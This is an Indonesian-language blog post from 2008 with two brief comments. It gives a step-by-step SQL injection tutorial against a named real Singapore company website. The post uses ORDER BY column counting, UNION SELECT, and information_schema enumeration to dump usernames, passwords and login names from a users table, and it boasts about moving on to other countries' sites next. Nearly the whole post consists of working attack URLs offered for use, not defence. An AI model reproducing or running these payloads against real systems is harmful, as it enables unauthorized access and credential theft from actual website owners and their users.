Ketemu lagi dengan saya...... hehehe masih tetep sql injection......... tapi targetnya beda coy bukan malay tapi sg........................... kpan kapan .au .us .go.id hehehehe
Kayak biasanya:
1. Cari target
Contoh targer:contoh: http://www.pdscientific.com.sg/source/news.php?id=1
2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://www.pdscientific.com.sg/source/news.php?id=1'
Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe
3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://www.pdscientific.com.sg/source/news.php?id=1
Sekarang silahkan kasi order ampe ketemu error....
Contoh:
http://www.pdscientific.com.sg/source/news.php?id=1 order by 1/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 2/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 3/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 4/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 5/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 6/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 7/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 8/* <---- ada error
Maka tersebut punya 7 colom....
4 Sekarang masukkan perintah unoin all select 1,2,3,4,5,6,7/* <<<--- serupakan colom yang ada dallam web tersebut
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,2,3,4,5,6,7/*
Maka akan keluar angka , misal angka yang keluar adalah 2 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi
5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll
6. Kita coba liat liat tabel yang ada
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables/*
7. Kita coba liat juga kolom2 nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns/*
Udah puas liat liat ???? Terserah deh di apain
8. Sekarang kita coba berburu username
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_name,3,4,5,6,7 from users/*
9.Sekarang coba berburu passwordnya.....
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_pwd,3,4,5,6,7 from users/*
10.Sekarang kita coba berburu user_id nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_id,3,4,5,6,7%20from%20users/*
11.Sekarang kita coba berburu login_namenya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_login,3,4,5,6,7%20from%20users/*
12. Sekarang kita coba semuanya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,concat(user_id,0x3a,user_login,0x3a,user_pwd,0x3a,user_name),3,4,5,6,7%20from%20users/*
Wah udah komplit nie..... skarang tinggal kreatifitas kamu aja............'
Wednesday, December 03, 2008
Subscribe to:
Post Comments (Atom)
2 comments:
mana sumbernya..............
sorry bro...got from mail..r u the author?
Post a Comment